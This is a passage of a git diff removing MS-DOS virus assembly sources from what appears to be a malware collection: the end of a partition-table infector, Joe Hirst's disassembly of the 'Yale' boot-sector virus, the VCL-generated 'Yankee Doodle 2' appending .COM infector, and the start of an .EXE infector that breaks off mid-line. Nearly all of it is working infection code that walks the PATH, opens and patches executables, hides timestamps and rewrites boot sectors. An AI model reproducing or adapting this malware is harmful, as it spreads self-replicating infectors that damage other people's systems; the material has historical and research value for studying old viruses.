- mov cx,7 ; ±²° ­  0 - mov dx,80h - int 13h - - jc loc_12 ; °¨ £°¥¸ª  ¨§¯º«­¿¢  BOOT - push cs - pop ds - push cs - pop es - mov si,3BEh ; Œ¥±²¨ partition table - mov di,1BEh - mov cx,242h - rep movsb ; Rep when cx >0 Mov [si] to es:[di] - - mov ax,301h - xor bx,bx ; ‡ ¯¨±¢  ± ¬¨¿² ¢¨°³± - inc cl - int 13h ; Disk dl=drive #: ah=func a3h - ; write sectors from mem es:bx - jmp short loc_12 ; Ž²¨¢  ¤  ¨§¯¨«­¿¢  BOOT - -;------------------------------------------------------------------------------------------ -; Ž² ²³ª ­ ² ²ª ±  ²¥ª±²®¢¥ -;------------------------------------------------------------------------------------------ - - pop es - pop cx - db 6Fh - jnz $+74h ; Jump if not zero - and [bx+si+43h],dl - and [bx+di+73h],ch - and [bp+6Fh],ch - ja $+22h ; Jump if above - push bx - jz $+71h ; Jump if zero - db 6Eh - db 65h - db 64h - and [bx],ax - or ax,0A0Ah - add [si+45h],cl - inc di - inc cx - dec sp - dec cx - push bx - inc bp - xor al,[bx+di] - add al,32h ; '2' - add word ptr ds:[0B00h][bx+si],ax ; (6B7E:0B00=0) - add ax,132h - db 72 dup (0) - \ No newline at end of file diff --git a/MSDOS/Y-Index/Virus.MSDOS.Unknown.yale-asm.asm b/MSDOS/Y-Index/Virus.MSDOS.Unknown.yale-asm.asm deleted file mode 100644 index b8c2592c..00000000 --- a/MSDOS/Y-Index/Virus.MSDOS.Unknown.yale-asm.asm +++ /dev/null @@ -1,365 +0,0 @@ -;****************************************************************************; -; ; -; -=][][][][][][][][][][][][][][][=- ; -; -=] P E R F E C T C R I M E [=- ; -; -=] +31.(o)79.426o79 [=- ; -; -=] [=- ; -; -=] For All Your H/P/A/V Files [=- ; -; -=] SysOp: Peter Venkman [=- ; -; -=] [=- ; -; -=] +31.(o)79.426o79 [=- ; -; -=] P E R F E C T C R I M E [=- ; -; -=][][][][][][][][][][][][][][][=- ; -; ; -; *** NOT FOR GENERAL DISTRIBUTION *** ; -; ; -; This File is for the Purpose of Virus Study Only! It Should not be Passed ; -; Around Among the General Public. It Will be Very Useful for Learning how ; -; Viruses Work and Propagate. But Anybody With Access to an Assembler can ; -; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ; -; Experience can Turn it Into a far More Malevolent Program Than it Already ; -; Is. Keep This Code in Responsible Hands! ; -; ; -;****************************************************************************; - page 65,132 - title The 'Yale' Virus -; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» -; º British Computer Virus Research Centre º -; º 12 Guildford Street, Brighton, East Sussex, BN1 3LS, England º -; º Telephone: Domestic 0273-26105, International +44-273-26105 º -; º º -; º The 'Yale' Virus º -; º Disassembled by Joe Hirst, April 1989 º -; º º -; º Copyright (c) Joe Hirst 1989. º -; º º -; º This listing is only to be made available to virus researchers º -; º or software writers on a need-to-know basis. º -; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ - - ; The virus consists of a boot sector only on a floppy disk. - ; The original boot sector is kept at track thirty-nine, head zero, - ; sector eight. - - ; The disassembly has been tested by re-assembly using MASM 5.0 - ; Note that this does not create an identical program, as the original - ; appears to have been assembled with A86 - - ; MASM would not assemble the instruction at offset 003CH (7C3CH) - ; This instruction is undefined on an 8088/8086, and illegal - ; on a 80286/80386. - - ; The program requires an origin address of 7C00H for the first sector - ; to load and run as a boot sector - - ; System variables are defined in either RAM or BOOT (or both) - ; depending on the segment used by the program - -RAM SEGMENT AT 400H - - ; System RAM fields - - ORG 13H -BW0413 DW ? ; Total RAM size - ORG 17H -BB0417 DB ? ; Key toggles - ORG 72H -BW0472 DW ? ; System reset word - -RAM ENDS - -BOOT SEGMENT AT 0 - - ; Interrupt addresses - - ORG 24H -BW0024 DW ? ; Interrupt 9 offset -BW0026 DW ? ; Interrupt 9 segment - ORG 64H -BW0064 DW ? ; Interrupt 19H offset -BW0066 DW ? ; Interrupt 19H segment - - ; System RAM fields - - ORG 410H -DW0410 DW ? ; System configuration - ORG 413H -DW0413 DW ? ; Total RAM size - - ; BIOS field - - ORG 0E502H -DWE502 DW ? - -BOOT ENDS - -CODE SEGMENT BYTE PUBLIC 'CODE' - - ASSUME CS:CODE,DS:NOTHING - -START: CLI - XOR AX,AX ; \ Set SS to zero - MOV SS,AX ; / - MOV SP,7C00H ; Set stack before boot area - STI - ASSUME DS:RAM - MOV BX,0040H ; \ Address RAM area - MOV DS,BX ; / - MOV AX,BW0413 ; Get size of RAM - MUL BX ; Convert to paragraphs - SUB AX,07E0H ; Subtract address after boot area - MOV ES,AX ; Target segment - ASSUME DS:CODE - PUSH CS ; \ Set DS to CS - POP DS ; / - CMP DI,3456H ; Simulated system reset? - JNE BP0010 ; Branch if not - DEC GENNUM[7C00H] ; Decrement generation number -BP0010: MOV SI,SP ; \ Address boot sector area - MOV DI,SI ; / - MOV CX,0200H ; 512 bytes to move - CLD - REPZ MOVSB ; Copy virus to high core - MOV SI,CX ; Address offset zero - MOV DI,7B80H ; Address interrupt save area - MOV CX,0080H ; 128 bytes to move - REPZ MOVSB ; Save first 32 interrupt pointers - CALL BP0030 ; Install interrupt 9 routine - PUSH ES ; \ Transfer to high core -; POP CS ; / - DB 0FH ; This is the previous instruction - PUSH DS ; \ Set ES to DS - POP ES ; / - MOV BX,SP ; Address boot sector area - MOV DX,CX ; A-drive, head zero - MOV CX,2708H ; Track 39, sector 8 - MOV AX,0201H ; Read one sector - INT 13H ; Disk I/O -BP0020: JB BP0020 ; Loop on error - JMP BP0190 - - ; Install interrupt 9 routine - -BP0030: DEC DW0413 ; Decrement RAM size - MOV SI,OFFSET BW0024 ; Address INT 9 pointer - MOV DI,OFFSET INT_09+7C00H ; Target far jump - MOV CX,4 ; 4 bytes to copy - CLI - REPZ MOVSB ; Copy far address - MOV BW0024,OFFSET BP0050+7C00H ; Install new offset - MOV BW0026,ES ; Install new segment - STI - RET - - ; Ctrl-Alt-Del depressed - acknowledge keyboard signal - -BP0040: IN AL,61H ; Get port B - MOV AH,AL ; Save current state - OR AL,80H ; Turn top bit on - OUT 61H,AL ; Set port B - XCHG AL,AH ; Get original state - OUT 61H,AL ; Reset port B - JMP SHORT BP0110 - - ; Format table for track 39, head zero, 8 sectors (unused) - - DB 027H, 000H, 001H, 002H - DB 027H, 000H, 002H, 002H - DB 027H, 000H, 003H, 002H - DB 027H, 000H, 004H, 002H - DB 027H, 000H, 005H, 002H - DB 027H, 000H, 006H, 002H - DB 027H, 000H, 007H, 002H - DB 027H, 000H, 008H, 002H - - ; Rubbish - - DB 024H, 000H, 0ADH, 07CH, 0A3H, 026H, 000H, 059H - DB 05FH, 05EH, 007H, 01FH, 058H, 09DH, 0EAH, 011H - DB 011H, 011H, 011H - - ; Interrupt 9 routine - -BP0050: PUSHF - STI - PUSH AX - PUSH BX - PUSH DS - PUSH CS ; \ Set DS to CS - POP DS ; / - ASSUME DS:CODE - MOV BX,KYSTAT[7C00H] ; Get Ctrl & Alt key states - IN AL,60H ; Get keyboard token - MOV AH,AL ; Save keyboard token - AND AX,887FH - CMP AL,1DH ; Was key Ctrl? - JNE BP0060 ; Branch if not - MOV BL,AH ; Save Ctrl key state - JMP SHORT BP0080 - -BP0060: CMP AL,38H ; Was key Alt? - JNE BP0070 ; Branch if not - MOV BH,AH ; Save Alt key state - JMP SHORT BP0080 - -BP0070: CMP BX,0808H ; Are Ctrl & Alt depressed? - JNE BP0080 ; Branch if not - CMP AL,17H ; Is key I? - JE BP0100 ; Branch if yes - CMP AL,53H ; Is key Del? - JE BP0040 ; Branch if yes -BP0080: MOV KYSTAT[7C00H],BX ; Save Ctrl & Alt key states -BP0090: POP DS - POP BX - POP AX - POPF - DB 0EAH ; Far jump to original INT 9 -INT_09 DW 0E987H, 0F000H - - ; Pass on Ctrl-Alt-I - -BP0100: JMP BP0240 ; Ctrl-Alt-I - - ; Ctrl-Alt-Del depressed - main processing - -BP0110: MOV DX,03D8H ; VDU mode control address - MOV AX,0800H ; Delay eight cycles - OUT DX,AL ; Disable display - CALL BP0250 ; Delay - MOV KYSTAT[7C00H],AX ; Reset Ctrl & Alt key states - MOV AL,3 ; Mode three - INT 10H ; VDU I/O - MOV AH,2 ; Set cursor address function - XOR DX,DX ; Row zero, column zero - MOV BH,DH ; Page zero - INT 10H ; VDU I/O - MOV AH,1 ; Set cursor size function - MOV CX,0607H ; Cursor lines 6 to 7 - INT 10H ; VDU I/O - MOV AX,0420H ; Delay 4 cycles - CALL BP0250 ; Delay - CLI - OUT 20H,AL ; End of interrupt - MOV ES,CX ; Address segment zero - MOV DI,CX ; Address offset zero - MOV SI,7B80H ; Address interrupt save area - MOV CX,0080H ; 128 bytes to move - CLD - REPZ MOVSB ; Restore first 32 interrupt pointers - MOV DS,CX ; Address zero - MOV BW0064,OFFSET BP0130+7C00H ; Install Int 19H offset - MOV BW0066,CS ; Install Int 19H segment - ASSUME DS:RAM - MOV AX,0040H ; \ Address RAM area - MOV DS,AX ; / - MOV BB0417,AH ; Set key toggles off - INC BW0413 ; Restore RAM size - PUSH DS - ASSUME DS:BOOT - MOV AX,0F000H ; \ Address BIOS - MOV DS,AX ; / - CMP DWE502,21E4H ; Is BIOS instruction IN AL,21H? - POP DS - JE BP0120 ; Branch if yes - INT 19H ; Disk bootstrap - -BP0120: DB 0EAH ; Far jump to BIOS routine - DW 0E502H, 0F000H - - ; Interrupt 19H routine - - ASSUME DS:BOOT -BP0130: XOR AX,AX ; \ Set DS to zero - MOV DS,AX ; / - MOV AX,DW0410 ; Get system configuration - TEST AL,1 ; Is there a floppy disk - JNZ BP0150 ; Branch if yes -BP0140: PUSH CS ; \ Set ES to CS - POP ES ; / - CALL BP0030 ; Install interrupt 9 routine - INT 18H ; Basica (IBM only) - -BP0150: MOV CX,4 ; Retry four times -BP0160: PUSH CX ; Save retry count - MOV AH,0 ; Reset disk sub-system - INT 13H ; Disk I/O - JB BP0170 ; Branch if error - MOV AX,0201H ; Read one sector - PUSH DS ; \ Set ES to DS - POP ES ; / - MOV BX,7C00H ; Boot sector buffer - MOV CX,1 ; Track zero, sector one - INT 13H ; Disk I/O -BP0170: POP CX ; Retrieve retry count - JNB BP0180 ; Branch if no error - LOOP BP0160 ; Retry - JMP BP0140 - -BP0180: CMP DI,3456H ; Simulated system reset? - JNE BP0200 ; Branch if not -BP0190: DB 0EAH ; Far jump to boot sector area - DW 7C00H, 0 - -BP0200: MOV SI,7C00H ; Boot sector area - MOV CX,OFFSET INT_09 ; Length to compare - MOV DI,SI ; Virus offset - PUSH CS ; \ Set ES to CS - POP ES ; / - CLD - REPZ CMPSB ; Is boot sector infected? - JE BP0220 ; Branch if yes - INC ES:GENNUM[7C00H] ; Increment generation number - MOV BX,7C7AH ; Address format table - MOV DX,0 ; Head zero, drive zero - MOV CH,27H ; Track 39 - MOV AH,5 ; Format track - JMP SHORT BP0210 ; This line was probably an INT 13H - - JB BP0230 ; Error branch for deleted INT 13H -BP0210: MOV ES,DX ; \ Write from boot sector area - MOV BX,7C00H ; / - MOV CL,8 ; Sector eight - MOV AX,0301H ; Write one sector - INT 13H ; Disk I/O - PUSH CS ; \ Set ES to CS - POP ES ; / - JB BP0230 ; Branch if error - MOV CX,1 ; Track zero, sector one - MOV AX,0301H ; Write one sector - INT 13H ; Disk I/O - JB BP0230 ; Branch if error -BP0220: MOV DI,3456H ; Signal simulated system reset - INT 19H ; Disk bootstrap - -BP0230: CALL BP0030 ; Install interrupt 9 routine - DEC ES:GENNUM[7C00H] ; Decrement generation number - JMP BP0190 - - ; Ctrl-Alt-I - - ASSUME DS:CODE -BP0240: MOV KYSTAT[7C00H],BX ; Save Ctrl & Alt key states - MOV AX,GENNUM[7C00H] ; Get generation number - ASSUME DS:RAM - MOV BX,0040H ; \ Address RAM area - MOV DS,BX ; / - MOV BW0472,AX ; Generation to system reset word - JMP BP0090 ; Pass on to original interrupt - - ; Delay - -BP0250: SUB CX,CX ; Maximum count -BP0260: LOOP BP0260 ; Delay loop - SUB AH,1 ; Decrement count - JNZ BP0260 ; Repeat loop - RET - - DB 027H, 000H, 008H, 002H ; Last sector of format table -GENNUM DW 016H ; Generation number -KYSTAT DW 0 ; Ctrl & Alt key states - DB 027H, 000H, 008H, 002H ; Last sector of format table - -CODE ENDS - - END START - \ No newline at end of file diff --git a/MSDOS/Y-Index/Virus.MSDOS.Unknown.yankee2.asm b/MSDOS/Y-Index/Virus.MSDOS.Unknown.yankee2.asm deleted file mode 100644 index 5ef5dd11..00000000 --- a/MSDOS/Y-Index/Virus.MSDOS.Unknown.yankee2.asm +++ /dev/null @@ -1,342 +0,0 @@ -; YANKEE2.ASM -- Yankee Doodle ][ -; Created with Nowhere Man's Virus Creation Laboratory v1.00 -; Written by Nowhere Man - -virus_type equ 0 ; Appending Virus -is_encrypted equ 0 ; We're not encrypted -tsr_virus equ 0 ; We're not TSR - -code segment byte public - assume cs:code,ds:code,es:code,ss:code - org 0100h - -main proc near - db 0E9h,00h,00h ; Near jump (for compatibility) -start: call find_offset ; Like a PUSH IP -find_offset: pop bp ; BP holds old IP - sub bp,offset find_offset ; Adjust for length of host - - lea si,[bp + buffer] ; SI points to original start - mov di,0100h ; Push 0100h on to stack for - push di ; return to main program - movsw ; Copy the first two bytes - movsb ; Copy the third byte - - mov di,bp ; DI points to start of virus - - mov bp,sp ; BP points to stack - sub sp,128 ; Allocate 128 bytes on stack - - mov ah,02Fh ; DOS get DTA function - int 021h - push bx ; Save old DTA address on stack - - mov ah,01Ah ; DOS set DTA function - lea dx,[bp - 128] ; DX points to buffer on stack - int 021h - - call search_files ; Find and infect a file - call search_files ; Find and infect another file - call get_hour - cmp ax,0011h ; Did the function return 17? - jle skip00 ; If less that or equal, skip effect - cmp ax,0013h ; Did the function return 19? - jge skip00 ; If greater than or equal, skip effect - jmp short strt00 ; Success -- skip jump -skip00: jmp end00 ; Skip the routine -strt00: lea si,[di + data00] ; SI points to data -get_note: mov bx,[si] ; Load BX with the frequency - or bx,bx ; Is BX equal to zero? - je play_tune_done ; If it is we are finished - - mov ax,034DDh ; - mov dx,0012h ; - cmp dx,bx ; - jnb new_note ; - div bx ; This bit here was stolen - mov bx,ax ; from the Turbo C++ v1.0 - in al,061h ; library file CS.LIB. I - test al,3 ; extracted sound() from the - jne skip_an_or ; library and linked it to - or al,3 ; an .EXE file, then diassembled - out 061h,al ; it. Basically this turns - mov al,0B6h ; on the speaker at a certain - out 043h,al ; frequency. -skip_an_or: mov al,bl ; - out 042h,al ; - mov al,bh ; - out 042h,al ; - - mov bx,[si + 2] ; BX holds duration value - xor ah,ah ; BIOS get time function - int 1Ah - add bx,dx ; Add the time to the length -wait_loop: int 1Ah ; Get the time again (AH = 0) - cmp dx,bx ; Is the delay over? - jne wait_loop ; Repeat until it is - - in al,061h ; Stolen from the nosound() - and al,0FCh ; procedure in Turbo C++ v1.0. - out 061h,al ; This turns off the speaker. - -new_note: add si,4 ; SI points to next note - jmp short get_note ; Repeat with the next note -play_tune_done: - -end00: -com_end: pop dx ; DX holds original DTA address - mov ah,01Ah ; DOS set DTA function - int 021h - - mov sp,bp ; Deallocate local buffer - - xor ax,ax ; - mov bx,ax ; - mov cx,ax ; - mov dx,ax ; Empty out the registers - mov si,ax ; - mov di,ax ; - mov bp,ax ; - - ret ; Return to original program -main endp - -search_files proc near - mov bx,di ; BX points to the virus - push bp ; Save BP - mov bp,sp ; BP points to local buffer - sub sp,135 ; Allocate 135 bytes on stack - - mov byte ptr [bp - 135],'\' ; Start with a backslash - - mov ah,047h ; DOS get current dir function - xor dl,dl ; DL holds drive # (current) - lea si,[bp - 134] ; SI points to 64-byte buffer - int 021h - - call traverse_path ; Start the traversal - -traversal_loop: cmp word ptr [bx + path_ad],0 ; Was the search unsuccessful? - je done_searching ; If so then we're done - call found_subdir ; Otherwise copy the subdirectory - - mov ax,cs ; AX holds the code segment - mov ds,ax ; Set the data and extra - mov es,ax ; segments to the code segment - - xor al,al ; Zero AL - stosb ; NULL-terminate the directory - - mov ah,03Bh ; DOS change directory function - lea dx,[bp - 70] ; DX points to the directory - int 021h - - lea dx,[bx + com_mask] ; DX points to "*.COM" - push di - mov di,bx - call find_files ; Try to infect a .COM file - mov bx,di - pop di - jnc done_searching ; If successful the exit - jmp short traversal_loop ; Keep checking the PATH - -done_searching: mov ah,03Bh ; DOS change directory function - lea dx,[bp - 135] ; DX points to old directory - int 021h - - cmp word ptr [bx + path_ad],0 ; Did we run out of directories? - jne at_least_tried ; If not then exit - stc ; Set the carry flag for failure -at_least_tried: mov sp,bp ; Restore old stack pointer - pop bp ; Restore BP - ret ; Return to caller -com_mask db "*.COM",0 ; Mask for all .COM files -search_files endp - -traverse_path proc near - mov es,word ptr cs:[002Ch] ; ES holds the enviroment segment - xor di,di ; DI holds the starting offset - -find_path: lea si,[bx + path_string] ; SI points to "PATH=" - lodsb ; Load the "P" into AL - mov cx,08000h ; Check the first 32767 bytes - repne scasb ; Search until the byte is found - mov cx,4 ; Check the next four bytes -check_next_4: lodsb ; Load the next letter of "PATH=" - scasb ; Compare it to the environment - jne find_path ; If there not equal try again - loop check_next_4 ; Otherwise keep checking - - mov word ptr [bx + path_ad],di ; Save the PATH address - mov word ptr [bx + path_ad + 2],es ; Save the PATH's segment - ret ; Return to caller - -path_string db "PATH=" ; The PATH string to search for -path_ad dd ? ; Holds the PATH's address -traverse_path endp - -found_subdir proc near - lds si,dword ptr [bx + path_ad] ; DS:SI points to PATH - lea di,[bp - 70] ; DI points to the work buffer - push cs ; Transfer CS into ES for - pop es ; byte transfer -move_subdir: lodsb ; Load the next byte into AL - cmp al,';' ; Have we reached a separator? - je moved_one ; If so we're done copying - or al,al ; Are we finished with the PATH? - je moved_last_one ; If so get out of here - stosb ; Store the byte at ES:DI - jmp short move_subdir ; Keep transfering characters - -moved_last_one: xor si,si ; Zero SI to signal completion -moved_one: mov word ptr es:[bx + path_ad],si ; Store SI in the path address - ret ; Return to caller -found_subdir endp - -find_files proc near - push bp ; Save BP - - mov ah,02Fh ; DOS get DTA function - int 021h - push bx ; Save old DTA address - - mov bp,sp ; BP points to local buffer - sub sp,128 ; Allocate 128 bytes on stack - - push dx ; Save file mask - mov ah,01Ah ; DOS set DTA function - lea dx,[bp - 128] ; DX points to buffer - int 021h - - mov ah,04Eh ; DOS find first file function - mov cx,00100111b ; CX holds all file attributes - pop dx ; Restore file mask -find_a_file: int 021h - jc done_finding ; Exit if no files found - call infect_file ; Infect the file! - jnc done_finding ; Exit if no error - mov ah,04Fh ; DOS find next file function - jmp short find_a_file ; Try finding another file - -done_finding: mov sp,bp ; Restore old stack frame - mov ah,01Ah ; DOS set DTA function - pop dx ; Retrieve old DTA address - int 021h - - pop bp ; Restore BP - ret ; Return to caller -find_files endp - -infect_file proc near - mov ah,02Fh ; DOS get DTA address function - int 021h - mov si,bx ; SI points to the DTA - - mov byte ptr [di + set_carry],0 ; Assume we'll fail - - cmp word ptr [si + 01Ah],(65279 - (finish - start)) - jbe size_ok ; If it's small enough continue - jmp infection_done ; Otherwise exit - -size_ok: mov ax,03D00h ; DOS open file function, r/o - lea dx,[si + 01Eh] ; DX points to file name - int 021h - xchg bx,ax ; BX holds file handle - - mov ah,03Fh ; DOS read from file function - mov cx,3 ; CX holds bytes to read (3) - lea dx,[di + buffer] ; DX points to buffer - int 021h - - mov ax,04202h ; DOS file seek function, EOF - cwd ; Zero DX _ Zero bytes from end - mov cx,dx ; Zero CX / - int 021h - - xchg dx,ax ; Faster than a PUSH AX - mov ah,03Eh ; DOS close file function - int 021h - xchg dx,ax ; Faster than a POP AX - - sub ax,finish - start + 3 ; Adjust AX for a valid jump - cmp word ptr [di + buffer + 1],ax ; Is there a JMP yet? - je infection_done ; If equal then exit - mov byte ptr [di + set_carry],1 ; Success -- the file is OK - add ax,finish - start ; Re-adjust to make the jump - mov word ptr [di + new_jump + 1],ax ; Construct jump - - mov ax,04301h ; DOS set file attrib. function - xor cx,cx ; Clear all attributes - lea dx,[si + 01Eh] ; DX points to victim's name - int 021h - - mov ax,03D02h ; DOS open file function, r/w - int 021h - xchg bx,ax ; BX holds file handle - - mov ah,040h ; DOS write to file function - mov cx,3 ; CX holds bytes to write (3) - lea dx,[di + new_jump] ; DX points to the jump we made - int 021h - - mov ax,04202h ; DOS file seek function, EOF - cwd ; Zero DX _ Zero bytes from end - mov cx,dx ; Zero CX / - int 021h - - mov ah,040h ; DOS write to file function - mov cx,finish - start ; CX holds virus length - lea dx,[di + start] ; DX points to start of virus - int 021h - - mov ax,05701h ; DOS set file time function - mov cx,[si + 016h] ; CX holds old file time - mov dx,[si + 018h] ; DX holds old file date - int 021h - - mov ah,03Eh ; DOS close file function - int 021h - - mov ax,04301h ; DOS set file attrib. function - xor ch,ch ; Clear CH for file attribute - mov cl,[si + 015h] ; CX holds file's old attributes - lea dx,[si + 01Eh] ; DX points to victim's name - int 021h - -infection_done: cmp byte ptr [di + set_carry],1 ; Set carry flag if failed - ret ; Return to caller - -set_carry db ? ; Set-carry-on-exit flag -buffer db 090h,0CDh,020h ; Buffer to hold old three bytes -new_jump db 0E9h,?,? ; New jump to virus -infect_file endp - - -get_hour proc near - mov ah,02Ch ; DOS get time function - int 021h - mov al,ch ; Copy hour into AL - cbw ; Sign-extend AL into AX - ret ; Return to caller -get_hour endp - -data00 dw 262,6,262,6,293,6,329,6,262,6,329,6,293,6,196,6 - dw 262,6,262,6,293,6,329,6,262,12,262,12 - dw 262,6,262,6,293,6,329,6,349,6,329,6,293,6,262,6 - dw 246,6,196,6,220,6,246,6,262,12,262,12 - dw 220,6,246,6,220,6,174,6,220,6,246,6,262,6,220,6 - dw 196,6,220,6,196,6,174,6,164,6,174,6,196,7 - dw 220,6,246,6,220,6,174,6,220,6,246,6,262,6,220,7 - dw 196,6,262,6,246,6,293,6,262,12,262,12 - dw 0 - -vcl_marker db "[VCL]",0 ; VCL creation marker - - -note db "[Yankee Doodle 2]",0 - db "Nowhere Man, [NuKE] '92",0 - -finish label near - -code ends - end main \ No newline at end of file diff --git a/MSDOS/Y-Index/Virus.MSDOS.Unknown.yanshort.asm b/MSDOS/Y-Index/Virus.MSDOS.Unknown.yanshort.asm deleted file mode 100644 index 99cb4e1a..00000000 --- a/MSDOS/Y-Index/Virus.MSDOS.Unknown.yanshort.asm +++ /dev/null @@ -1,1129 +0,0 @@ -.MODEL SMALL -.CODE - -comment / - Good luck! - - Vladimir Botchev, CICT-BAS, december 1988 - - / - -data_area struc ;Define a pattern for working data - ;area -DS_save dw ? -ES_save dw ? -IP_save dw ? -CS_save dw ? -SS_save dw ? -filematch db '*.exe',00h ;Names for files to infect -matchall db '*.*',00h ;needed for the matching procedure -infected dw 00h ;A very useful flag -help_flag dw 00h ;These two flags are needed to -where_from_flag dw 00h ;determine if virus is free running - ;or from an infected program - ;therefore it's very important - ;that where_from_flag value - ;is set to zero at assembly time -handle dw ? -ip_old dw ? ;old instruction pointer -cs_old dw ? ;old value of code segment -ss_old dw ? -far_push dw ? -save_push dw ? -buffer1 db '\',63 dup (?) -virus_stamp db 'motherfucker' ;Very hard to obtain in - ;a random way - -buffer2 db 2b0h dup (?) -new_area db 64 dup (?) -new_data db 64 dup (?) -pointer1 dw ? -pointer2 dw ? -pointer3 dw ? -pointer4 dw ? -pointer5 dw ? -pointer6 dw ? -pointer7 dw ? -pointer8 dw ? - -data_area ends - - org 100h ;Defined for .com file as virus must - ;be able to run on itself -start: call setup_data ;This is a near call therefore it's a - ;three byte instruction.It's purpose is - ;to catch correct data area address - ;even when virus is appended to the - ;infected .exe program -adjust equ offset pgm_start ;Known offset value -pgm_start label word ; - -virussize equ 2793 - - work: mov ax,ds ;Save old DS - push cs - pop ds ;Update to needed DS value - mov si,offset buffer.DS_save ;Put old DS in a quiet place - sub si,adjust - add si,bx - mov [si],ax - - mov si,offset buffer.ES_save ;Save it because Get DTA side effects - sub si,adjust - add si,bx - mov ax,es - mov [si],ax - push cs ;Imperative because DI usage - pop es - - push bx ;It's imperative to always keep - ;this value unchanged - mov ax,2f00h ;Get DTA function call - int 21h - - mov cx,bx ;save address found - pop bx - mov si,offset buffer.pointer1 - sub si,adjust - add si,bx - mov [si],cx - add si,2 ;Locate the segment immediately above - mov ax,es - mov [si],ax - push cs - pop es - - mov di,offset buffer.buffer1 ;adjust for first search - inc di ;Jump over the '\' - sub di,adjust - add di,bx - mov dx,0000h - push bx - call search_exe - pop bx - mov si,offset buffer.where_from_flag - sub si,adjust - add si,bx - cmp word ptr [si],0000h - jnz infected_run - int 020H - -infected_run: - mov si,offset buffer.pointer1 - sub si,adjust - add si,bx - mov dx,[si] - push ds - mov ax,[si+2] - mov ds,ax - push bx - mov ax,1a00h - int 21h - pop bx - pop ds ;Restore original DTA - - mov si,offset buffer.ES_save - sub si,adjust - add si,bx - mov ax,[si] - mov es,ax ;Restore ES - - ;Here you can do whatever you want - - push bx - call mary_proc - pop bx - - - - mov si,offset buffer.IP_save - sub si,adjust - add si,bx - mov ax,[si] - mov dx,[si+2] - mov si,offset buffer.far_push ;Restore original code - sub si,adjust ;segment - add si,bx - mov cx,[si] - push ax - mov ax,cs - sub ax,cx - mov di,ax ;For stack - add dx,ax - pop ax - - mov si,offset buffer.SS_save - sub si,adjust ;Restore stack segment - add si,bx - mov cx,word ptr [si] - add cx,di - - push es - pop ds - - cli - mov ss,cx - sti - - - push dx - push ax - retf - - -search_exe PROC - - push si - push dx - call transfer_filespec ;transfer filename in another - ;working area - call find_first ;try to find a first match - jc not_here ;first match not found - call try_to_infect ;if found try to infect - ;infected != 0 if success - mov si,offset buffer.infected - sub si,adjust - add si,bx - test word ptr [si],0ffffh - jz try_next - jmp quiet_exit - -try_next: - call find_next ;If infection was not succesful - ;try once more - jc not_here - - call try_to_infect ;If match found try to infect - mov si,offset buffer.infected ;again - sub si,adjust - add si,bx - test word ptr [si],0ffffh - jz try_next - - jmp quiet_exit ;quiet exit simply jumps - ;to a return instruction -not_here: - pop dx ;If first searches are - push dx ;unsuccesful try a '*.*' match - call search_all - call find_first - jnc attribute_test ;i.e. expect probably to - ;find a subdirectory -quiet_exit: - pop dx - pop si - ret - -attribute_test: - mov si,dx ;offset of DTA - test byte ptr [si+015h],010h ;where attribute byte is to - ;be found.Try first with - ;subdirectory attribute - jne dir_found ;subdirectory found -more_tries: - call find_next ;Since the search was initiated - ;with '*.*' if this is not a - ;directory try to found one - jc quiet_exit ;No sense to search more - - test byte ptr [si+015h],010h - jz more_tries ;Search to the end -dir_found: - cmp byte ptr [si+01Eh],02Eh ;Compare with the subdirectory - ;mark '.' - jz more_tries ;looking for files no - ;subdirectories - - call dta_compute ;Valid entry, now set some DTA - ;and continue to search - push ax - mov ah,01Ah ;Set DTA function call - int 021h - pop ax - push si - mov si,offset buffer.infected - sub si,adjust - add si,bx - test word ptr [si],0ffffh - pop si - jnz quiet_exit - - jmp more_tries - - -search_exe ENDP - -dta_compute PROC - - push di ;Save some registers - push si - push ax - push bx - cld ;Up count for SI,DI pair - mov si,dx ;DTA address to SI - add si,01EH ;and add subdirectory - ;name offset - -store_loop: - lodsb - stosb - or al,al - jne store_loop ;store loop - - std - stosb - mov al,05Ch ;Put in place the path name - ;constructor - - stosb - add di,2 ;Adjust di for new searches - call search_exe ; - ;a heavily recursion - ; - pop bx ;some cleanup and exit - ; - pop ax - pop si - pop di - ret - -dta_compute ENDP - -try_to_infect PROC - - push ax - push bx - push cx - push dx - push si - push di - - push es - push bx - mov ax,2f00h ;Get DTA function call - int 21h - mov ax,bx - pop bx - mov si,offset buffer.pointer3 - sub si,adjust - add si,bx - mov [si],ax ;Offset saved - add si,2 - mov ax,es - mov [si],ax - pop es ;Segment located just above - - mov dx,offset buffer.new_data - sub dx,adjust - add dx,bx - push bx - mov ax,1a00h - int 21h ;Set DTA function call - pop bx ;It's very important to - ;save BX in all calls - - mov di,offset buffer.new_area - mov si,offset buffer.buffer1 - sub di,adjust - sub si,adjust - add di,bx - add si,bx - - cld ;Move previously found path- - ;name or filename to new - ;data area -move_path: - lodsb - stosb - or al,al - jnz move_path - std ;adjust DI to recieve - mov al,'\' ;filename. - mov cx,0040h - std ;Search backward - repne scasb - - mov si,offset buffer.pointer3 - sub si,adjust - add si,bx - mov ax,[si] - mov si,ax - add di,2 - -o_kay: - add si,001eh ;The beginning of the - ;filename... - cld ;Now move name - -move_fnm: - lodsb - stosb - or al,al - jnz move_fnm - - push dx - push bx - mov dx,offset buffer.new_area - sub dx,adjust - add dx,bx - mov ax,3d02h ;Open file with handle - ;for read/write - int 21h - pop bx - pop dx - jnc go_ahead ;In case file cannot be opened - jmp error_exit - -go_ahead: - mov si,offset buffer.handle - sub si,adjust - add si,bx - mov [si],ax ;Save handle - - push bx - mov bx,ax ;Prepare for lseek - push dx - mov cx,0000h ;Look at the end of the file - mov dx,0000h ;Offset of -12 from the end - ;of the file - mov ax,4202h ;Lseek function call - int 21h - mov cx,dx - pop dx - pop bx - jnc compute_length - jmp close_error - -compute_length: - - sub ax,000ch - sbb cx,0000h ;Exact position - - -save_offset: ; - mov si,offset buffer.pointer5 - sub si,adjust - add si,bx - mov [si],ax - add si,2 - mov [si],cx - - push bx - push dx - mov si,offset 